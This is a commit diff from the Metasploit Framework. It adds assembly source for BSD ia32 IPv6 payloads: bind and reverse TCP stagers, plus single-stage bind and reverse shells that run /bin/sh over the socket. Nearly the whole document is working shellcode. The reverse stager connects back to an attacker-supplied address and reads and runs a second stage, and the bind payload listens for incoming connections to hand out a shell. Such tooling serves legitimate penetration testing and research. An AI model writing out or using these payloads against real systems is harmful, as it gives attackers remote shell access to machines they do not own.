Add BSD IPv6 payloads (source only for now)

external/source/shellcode/bsd/ia32/Makefile

@@ -1,7 +1,7 @@
 ASM=nasm
-STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse
+STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6
 STAGES=stage_tcp_shell
-SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock
+SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6
 OBJS=${STAGERS} ${STAGES} ${SINGLE}
 
 include ../../Makefile.incl

external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm

@@ -0,0 +1,36 @@
+;;
+; 
+;        Name: single_bind_tcp_shell
+;     Version: $Revision: 1628 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Single portbind TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Shell
+; meta-description=Listen on a port and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=bind
+; meta-name=bind_tcp_shell
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=0x8
+;;
+BITS   32
+
+%define  USE_SINGLE_STAGE 1
+
+%include "generic.asm"
+%include "stager_sock_bind_ipv6.asm"
+
+shell:
+	execve_binsh EXECUTE_REDIRECT_IO

external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm

@@ -0,0 +1,42 @@
+;;
+; 
+;        Name: single_reverse_tcp_shell
+;     Version: $Revision: 1626 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Single reverse TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Shell
+; meta-description=Connect back to the attacker and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_shell
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=0x0a
+; meta-offset-lport=0x13
+;;
+BITS   32
+
+%define  USE_SINGLE_STAGE 1
+%define  ASSUME_REG_EAX   0
+
+; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD 
+; clears edx.
+; %define  ASSUME_REG_EDX   2
+
+%include "stager_sock_reverse_ipv6.asm"
+%include "generic.asm"
+
+shell:
+	execve_binsh EXECUTE_REDIRECT_IO

external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm

@@ -0,0 +1,108 @@
+;;
+; 
+;        Name: stager_sock_bind_ipv6
+;   Qualities: Can Have Nulls
+;     Version: $Revision: 1628 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Implementation of a BSD portbind over IPv6 TCP stager.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Stager
+; meta-description=Listen on a port for a connection and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=bind
+; meta-name=bind_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=26
+;;
+BITS   32
+GLOBAL main
+
+main:
+
+socket:
+	xor eax, eax
+	push eax        ;   Protocol: (IP=0)
+	inc eax
+	push eax        ;       Type: (SOCK_STREAM=1)
+	push byte 28    ;     Domain: (PF_INET6=28)
+	push byte 97
+	pop  eax        ; socket()
+	push eax        ; padding
+	int  0x80
+	mov ebx, eax    ; save socket
+	
+	xor edx, edx
+
+	push edx	          ; uint32_t        sin6_scope_id;  /* scope zone index */			
+	push edx              ; struct in6_addr sin6_addr;      /* IP6 address */
+	push edx
+	push edx
+	push edx
+	push edx              ; uint32_t        sin6_flowinfo;  /* IP6 flow information */
+	push dword 0xbfbf1c1c      
+	                      ; in_port_t       sin6_port;      /* Transport layer port # */
+	                      ; uint8_t         sin6_len;       /* length of this struct */
+                          ; sa_family_t     sin6_family;    /* AF_INET6 */
+			
+	mov ecx, esp
+
+bind:
+	push byte 28
+	push ecx
+	push eax
+	push byte 104
+	pop  eax
+	push eax ; padding
+	int  0x80
+
+listen:
+	mov  al, 106
+	int  0x80
+
+accept:
+	push edx
+	push ebx
+%ifndef USE_SINGLE_STAGE
+	mov  dh, 0x10
+%endif
+	push edx
+	mov  al, 30
+	int  0x80
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+	push ecx
+	push eax
+	push ecx
+%ifdef FD_REG_EBX
+	xchg eax, ebx
+%else
+	xchg eax, edi
+%endif
+	push byte 0x3
+	pop  eax
+	int  0x80
+	ret
+
+%else
+
+%ifdef FD_REG_EBX
+	xchg eax, ebx
+%else
+	xchg eax, edi
+%endif
+
+%endif

external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm

@@ -0,0 +1,95 @@
+;;
+; 
+;        Name: stager_sock_reverse_ipv6
+;   Qualities: Can Have Nulls
+;     Version: $Revision: 1626 $
+;     License: 
+;
+;        This file is part of the Metasploit Exploit Framework
+;        and is subject to the same licenses and copyrights as
+;        the rest of this package.
+;
+; Description:
+;
+;        Implementation of a BSD reverse TCP stager over IPv6
+;
+;        File descriptor in edi.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Stager
+; meta-description=Connect back to the framework and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=43
+; meta-offset-lport=36
+; meta-offset-scope=59
+;;
+BITS   32
+GLOBAL main
+
+main:
+
+socket:
+
+	xor eax, eax
+	push eax        ;   Protocol: (IP=0)
+	inc eax
+	push eax        ;       Type: (SOCK_STREAM=1)
+	push byte 28    ;     Domain: (PF_INET6=28)
+
+	push byte 97
+	pop  eax        ; socket()
+	push eax        ; padding
+	int  0x80
+	jmp short bounce_to_connect
+	
+connect:
+	pop ecx
+	push byte 28
+	push ecx
+	push eax
+
+%ifdef FD_REG_EBX
+	xchg eax, ebx
+%else
+	xchg eax, edi
+%endif
+
+	push byte 98
+	pop  eax
+	push eax ; padding
+	int  0x80
+
+	jmp short skip_bounce
+
+bounce_to_connect:
+	call connect
+	
+ipv6_address:
+	db 28          ; uint8_t         sin6_len;       /* length of this struct */
+	db 28          ; sa_family_t     sin6_family;    /* AF_INET6 */
+	dw 0xbfbf      ; in_port_t       sin6_port;      /* Transport layer port # */
+	dd 0           ; uint32_t        sin6_flowinfo;  /* IP6 flow information */
+	dd 0x43424140  ; struct in6_addr sin6_addr;      /* IP6 address */
+	dd 0x48474645
+	dd 0x4d4b4a49
+	dd 0x51504f4e
+	dd 0           ; uint32_t        sin6_scope_id;  /* scope zone index */
+
+skip_bounce:
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+	mov  al, 0x3
+	mov  byte [ecx - 0x3], 0x10
+	int  0x80
+	ret
+
+%endif